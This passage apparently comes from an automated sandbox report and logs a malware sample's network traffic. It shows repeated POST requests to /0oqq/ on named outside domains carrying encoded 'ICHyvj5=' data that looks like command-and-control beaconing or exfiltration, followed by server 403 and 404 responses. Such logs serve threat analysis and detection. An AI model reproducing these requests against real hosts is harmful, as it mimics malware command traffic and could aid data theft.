69 4e 70 6f 44 38 68 35 31 6b 4a 5f 46 53 6e 39 69 64 7e 50 34 55 6c 55 37 33 4f 2d 55 79 41 62 4d 37 75 67 44 69 36 4d 44 58 42 64 77 64 49 69 7e 66 44 53 50 30 51 4f 5a 4a 6e 2d 39 52 44 66 41 52 28 45 6f 36 7e 65 56 7a 4f 58 64 53 49 74 36 61 4b 31 55 70 6c 59 49 4e 39 69 35 48 78 6a 6f 77 30 79 45 4a 36 51 66 6d 37 64 42 63 28 44 39 79 4c 41 6a 6a 48 62 79 76 5a 31 33 71 47 55 4e 5a 51 6b 6c 69 4d 30 66 48 5a 44 66 48 57 35 41 33 46 57 45 6d 35 35 69 31 41 71 36 39 5a 4b 41 4c 51 56 45 68 74 7a 34 34 6c 4a 6d 4a 47 41 63 58 74 5a 33 65 7e 58 41 53 53 2d 74 2d 69 4a 55 77 41 4e 49 42 4e 64 43 6e 58 6c 7e 75 66 76 4b 48 28 70 73 66 55 35 55 4d 49 53 64 77 56 4b 65 76 69 31 42 59 36 71 47 57 30 75 70 35 70 79 44 31 50 58 65 41 39 51 49 46 49 72 31 62 64 76 78 41 4f 65 4d 70 6a 78 4f 38 50 46 52 4e 48 43 73 53 56 49 68 59 6c 76 54 70 50 33 67 69 31 34 30 50 6f 4b 51 5f 32 45 68 61 4a 5f 75 31 4b 6e 7a 36 47 5a 4b 6c 58 6b 68 49 67 43 30 73 79 64 49 2d 55 31 72 71 28 59 4a 55 72 2d 44 2d 67 64 32 57 43 59 32 75 4b 35 5a 46 4e 68 31 7a 69 4b 55 50 38 59 53 39 77 30 58 39 4c 68 28 44 74 56 49 43 6a 5a 35 39 4f 55 59 31 79 34 45 2d 43 34 76 53 6e 42 58 47 4b 59 56 66 6c 4f 47 56 63 5a 38 77 6d 7a 69 65 43 38 52 59 33 44 4f 59 73 45 67 49 64 37 4a 55 37 46 30 65 47 42 47 70 58 32 42 43 6d 52 64 56 67 67 4c 65 52 33 44 31 78 36 38 45 61 6b 45 57 32 45 6a 4a 34 31 38 5a 49 5f 79 57 46 55 61 6a 33 34 30 6c 6f 6d 79 58 47 66 4e 4d 51 31 47 72 42 30 50 46 7a 62 76 4d 7e 4a 54 6e 33 50 4c 42 34 55 31 4d 77 6f 6f 2d 74 6e 7a 75 58 30 55 6d 53 6f 38 7a 53 71 4a 4b 51 4f 31 56 28 63 70 59 61 56 6c 66 75 45 47 36 76 70 56 56 35 30 48 54 4e 46 4d 38 4b 50 45 38 38 6d 35 71 62 66 69 36 68 73 54 64 46 35 68 66 68 50 32 57 45 68 65 4d 65 5f 64 62 64 62 7a 64 54 74 75 5a 64 72 39 4b 7a 4b 66 35 34 37 54 75 32 6f 77 55 47 6d 31 48 6a 42 77 49 49 32 48 58 30 55 30 68 51 70 64 64 42 6a 77 50 48 33 6a 76 28 74 44 5a 50 52 65 71 72 4c 7e 38 77 62 63 51 58 63 33 4e 48 65 69 45 6e 64 68 76 4b 77 5a 4f 79 77 34 70 73 36 4c 69 51 45 31 79 56 46 4d 61 59 76 76 6b 49 64 35 6e 55 51 32 5a 7a 6e 57 36 6d 42 42 6d 71 31 4
          Source: global trafficHTTP traffic detected: POST /0oqq/ HTTP/1.1Host: www.virginhairweave.co.ukConnection: closeContent-Length: 189Cache-Control: no-cacheOrigin: http://www.virginhairweave.co.ukUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.virginhairweave.co.uk/0oqq/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 49 43 48 79 76 6a 35 3d 6a 52 49 6f 70 75 49 4b 6d 35 6d 34 62 38 49 58 62 6f 44 7a 28 34 55 62 41 6f 66 54 52 54 68 4e 72 58 6f 32 6d 65 67 76 6b 74 6b 6b 47 6d 49 32 36 6f 53 63 34 4c 33 5f 47 39 37 75 4c 6e 31 75 35 4c 50 6b 56 61 62 6e 31 72 48 72 36 47 50 35 76 63 49 32 71 5f 4f 41 68 4c 38 32 4f 6d 68 37 63 36 55 36 76 52 4e 62 4f 69 5a 30 71 55 62 48 62 69 39 76 75 58 55 32 4e 61 74 75 68 4d 61 4c 73 45 49 72 47 32 79 32 4e 73 74 52 64 75 68 53 73 38 63 52 77 41 31 48 4a 66 46 45 72 78 34 4a 4e 49 69 53 6f 36 52 37 52 4d 63 70 43 72 30 31 30 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ICHyvj5=jRIopuIKm5m4b8IXboDz(4UbAofTRThNrXo2megvktkkGmI26oSc4L3_G97uLn1u5LPkVabn1rHr6GP5vcI2q_OAhL82Omh7c6U6vRNbOiZ0qUbHbi9vuXU2NatuhMaLsEIrG2y2NstRduhSs8cRwA1HJfFErx4JNIiSo6R7RMcpCr010w).
          Source: global trafficHTTP traffic detected: POST /0oqq/ HTTP/1.1Host: www.virginhairweave.co.ukConnection: closeContent-Length: 5337Cache-Control: no-cacheOrigin: http://www.virginhairweave.co.ukUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.virginhairweave.co.uk/0oqq/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 49 43 48 79 76 6a 35 3d 6a 52 49 6f 70 75 49 4b 6d 35 6d 34 42 66 51 58 64 4a 44 7a 71 49 55 59 63 59 66 54 44 54 68 52 72 58 6b 32 6d 66 6c 69 6c 62 45 6b 47 31 41 32 39 4b 36 63 72 62 33 5f 4f 64 37 71 55 33 31 43 35 4c 4c 65 56 65 54 6f 31 70 72 72 38 55 33 35 6f 38 49 31 6a 5f 4f 46 6b 4c 38 33 57 47 68 37 63 39 63 4d 76 51 4e 4c 4f 6a 68 30 71 6d 28 48 62 6b 4a 75 6f 48 55 33 50 61 74 75 68 4d 57 55 73 45 49 56 47 32 72 74 4e 73 4e 52 63 34 46 53 75 74 63 53 33 51 30 50 41 5f 45 7a 36 53 70 67 4c 5f 79 65 37 36 5a 48 48 71 67 33 4a 6f 4e 6b 68 66 43 72 73 6a 7a 71 51 30 30 35 63 42 62 34 53 4b 79 67 68 6c 43 5a 65 6b 45 48 68 70 61 4a 6e 64 51 30 6b 59 50 6e 6f 53 38 47 34 65 70 4e 35 35 59 65 69 42 56 38 65 78 70 6d 73 4d 6e 34 56 48 31 79 41 45 46 6e 76 38 6e 77 75 46 56 79 43 4c 35 58 64 32 75 4b 53 37 43 44 32 5f 49 53 78 51 66 71 44 49 6f 41 4e 75 57 6a 51 30 79 44 50 45 59 43 4e 51 64 35 74 53 50 4b 56 4c 36 6c 36 4c 46 37 6c 43 31 36 67 47 6e 58 41 4c 58 49 58 7a 37 69 6a 6b 75 48 4a 4c 65 38 61 39 4e 61 37 67 77 50 59 72 36 58 6f 78 45 6c 4d 56 32 77 66 70 6d 43 42 66 41 59 5a 6b 43 63 41 65 56 74 71 44 76 64 76 6f 70 30 4e 41 7a 58 75 52 7e 2d 6e 43 57 4e 39 6e 67 68 65 64 7e 52 4e 46 6b 77 48 33 73 4b 70 4b 30 6d 61 36 4b 37 53 68 67 5a 67 66 61 33 53 72 72 2d 31 32 64 43 59 57 6a 69 39 66 71 58 66 42 63 30 63 35 77 44 46 48 43 56 49 53 55 77 44 78 75 33 37 4c 79 52 58 67 33 64 68 79 36 42 4f 49 7e 50 31 48 50 78 53 55 72 52 50 47 76 67 49 30 77 4a 38 39 6c 6a 4d 31 52 6e 59 78 39 71 71 6c 59 32 55 4c 6d 55 4c 4a 61 52 69 68 6a 66 6c 74 66 74 45 54 78 6b 53 6f 39 34 78 46 66 50 69 4d 78 6f 67 65 28 67 71 5a 31 49 67 34 50 6b 4d 4c 4d 58 46 71 28 4b 4d 43 34 33 74 34 4b 6f 4c 6e 6d 2d 36 47 35 64 7e 67 51 53 44 67 4e 46 73 76 79 64 6d 48 54 42 35 4d 48 41 67 33 53 69 51 75 79 73 6b 35 39 44 74 53 7e 72 35 31 47 35 49 43 61 77 71 54 4a 53 4f 6b 39 6a 79 46 41 7a 73 4a 35 31 42 66 7e 46 54 6e 46 33 79 71 77 6c 73 7a 57 50 34 75 4a 42 66 2d 6b 4d 50 46 59 72 55 43 41 78 67 39 69 68 71 59 6b 48 6a 32 4d 37 4e 44 78 63 4a 63 64 47 63 56 61 48 6b 31 6f 57 61 59 4d 72 51 57 59 31 4d 47 47 62 73 7a 46 30 75 6f 4a 6e 73 74 42 46 71 45 32 41 6e 6f 41 6e 28 42 35 6c 30 4b 68 44 4c 30 62 76 57 58 73 79 41 61 4e 43 75 48 58 62 56 75 31 6d 4a 5a 37 6f 43 68 49 5a 54 5f 73 6e 6b 4d 63 6f 77 78 6e 69 50 52 6e 7a 41 34 61 61 47 58 5a 32 54 6a 68 53 42 31 37 51 46 59 55 39 72 64 67 51 7e 32 44 61 5a 62 6b 70 49 56 4b 72 4f 57 37 79 28 68 6b 47 73 68 7e 52 75 6b 73 63 66 48 77 2d 4c 53 74 6c 43 32 4f 74 65 39 35 33 48 66 39 70 68 4
          Source: global trafficHTTP traffic detected: POST /0oqq/ HTTP/1.1Host: www.dirdikyepedia.comConnection: closeContent-Length: 189Cache-Control: no-cacheOrigin: http://www.dirdikyepedia.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.dirdikyepedia.com/0oqq/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 49 43 48 79 76 6a 35 3d 43 54 34 69 37 44 66 32 4d 59 41 6c 70 46 45 77 4f 66 44 41 6f 67 75 42 6d 5a 48 65 61 71 79 7a 50 69 4c 4d 59 43 74 6b 46 66 6e 54 5a 7a 76 6b 72 6f 5a 79 62 48 6c 6b 42 39 76 43 53 38 77 63 42 6c 67 75 6d 61 54 73 30 6b 6c 47 51 68 4a 4d 61 52 36 4b 6f 54 75 6b 42 71 43 4e 30 4b 38 47 71 2d 58 34 59 2d 6d 77 71 6d 59 4f 35 39 68 6a 66 4c 46 74 41 4d 4c 42 37 32 4b 30 54 6d 31 78 46 5f 62 35 39 75 4a 66 6b 47 65 4b 64 43 7e 49 63 6d 76 59 65 79 48 6b 32 71 38 43 55 6e 4e 4f 39 61 64 71 59 66 53 4d 4c 4b 33 4f 38 2d 71 35 64 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ICHyvj5=CT4i7Df2MYAlpFEwOfDAoguBmZHeaqyzPiLMYCtkFfnTZzvkroZybHlkB9vCS8wcBlgumaTs0klGQhJMaR6KoTukBqCN0K8Gq-X4Y-mwqmYO59hjfLFtAMLB72K0Tm1xF_b59uJfkGeKdC~IcmvYeyHk2q8CUnNO9adqYfSMLK3O8-q5dg).
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1date: Mon, 20 Mar 2023 08:08:33 GMTcontent-type: text/htmlcontent-length: 175x-fail-reason: Bad Actorconnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.13.6.1</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1date: Mon, 20 Mar 2023 08:08:39 GMTcontent-type: text/htmlcontent-length: 175x-fail-reason: Bad Actorconnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.13.6.1</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Mon, 20 Mar 2023 08:08:55 GMTserver: LiteSpeedx-powered-by: Niagahosterstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-xss-protection: 1; mode=blockx-content-type-options: nosniffvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Mon, 20 Mar 2023 08:08:58 GMTserver: LiteSpeedx-powered-by: Niagahosterstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-xss-protection: 1; mode=blockx-content-type-options: nosniffvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Mon, 20 Mar 2023 08:09:10 GMTserver: LiteSpeedx-powered-by: Niagahosterstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-xss-protection: 1; mode=blockx-content-type-options: nosniffvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 20 Mar 2023 08:09:29 GMTcontent-type: text/html; charset=iso-8859-1transfer-encoding: chunkedvary: Accept-Encodingserver: Apachex-origin-cache-status: MISSx-cdn-cache-status: MISSx-via: FRA1connection: closeData Raw: 43 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: C4<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>0
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 08:09:48 GMTServer: ApacheContent-Length: 16056Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 